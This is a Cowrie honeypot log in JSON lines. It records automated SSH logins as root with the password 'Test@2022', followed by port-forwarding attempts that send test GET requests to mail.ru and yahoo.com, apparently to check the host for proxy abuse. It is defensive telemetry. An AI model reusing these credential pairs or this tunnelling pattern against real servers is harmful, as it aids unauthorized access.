{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.228055Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.486288Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11065,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11065","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.538857Z","session":"e883c0579b37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.590762Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":19184,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:19184","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.738042Z","session":"e883c0579b37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.789932Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":3912,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:3912","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.934161Z","session":"e883c0579b37"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.986290Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.038749Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12388,"dst_ip":"1.2.3.4","dst_port":22,"session":"d93c6c749e19","protocol":"ssh","message":"New connection: 77.83.207.83:12388 (1.2.3.4:22) [session: d93c6c749e19]","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.089195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.090080Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.141012Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47126,"dst_ip":"1.2.3.4","dst_port":23,"session":"137ba79c88bf","protocol":"telnet","message":"New connection: 212.227.235.229:47126 (1.2.3.4:23) [session: 137ba79c88bf]","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.386997Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.395912Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23834,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23834","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.447474Z","session":"d93c6c749e19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.498470Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":590,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:590","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.641191Z","session":"d93c6c749e19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.692093Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":12544,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12544","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.837210Z","session":"d93c6c749e19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.888237Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.939929Z","src_ip":"77.83.207.83","session":"d93c6c749e19"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12492,"dst_ip":"1.2.3.4","dst_port":22,"session":"0753c9a31bc9","protocol":"ssh","message":"New connection: 77.83.207.83:12492 (1.2.3.4:22) [session: 0753c9a31bc9]","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.989385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:56.990134Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.040563Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.291170Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26836,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26836","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.342403Z","session":"0753c9a31bc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.392706Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":26543,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26543","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.536621Z","session":"0753c9a31bc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.587093Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":17775,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17775","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.728579Z","session":"0753c9a31bc9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.778834Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.829802Z","src_ip":"77.83.207.83","session":"0753c9a31bc9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12594,"dst_ip":"1.2.3.4","dst_port":22,"session":"dff0e9fd5a56","protocol":"ssh","message":"New connection: 77.83.207.83:12594 (1.2.3.4:22) [session: dff0e9fd5a56]","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.878805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.879627Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:57.929686Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.061954Z","src_ip":"212.227.125.160","session":"87702f8d34a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.179279Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14954,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14954","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.230236Z","session":"dff0e9fd5a56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.280740Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20138,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20138","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.424345Z","session":"dff0e9fd5a56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.474397Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24644,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24644","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.616621Z","session":"dff0e9fd5a56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.666730Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.718101Z","src_ip":"77.83.207.83","session":"dff0e9fd5a56"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12696,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e2ea084db0e","protocol":"ssh","message":"New connection: 77.83.207.83:12696 (1.2.3.4:22) [session: 5e2ea084db0e]","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.767675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.768595Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:58.818982Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.070289Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8513,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8513","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.121544Z","session":"5e2ea084db0e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.172127Z","src_ip":"77.83.207.83","session":"5e2ea084db0e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":29166,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:29166","sensor":"my-vps","timestamp":"2025-08-31T03:49:59.316978Z","session":"5e2ea084db0e"}
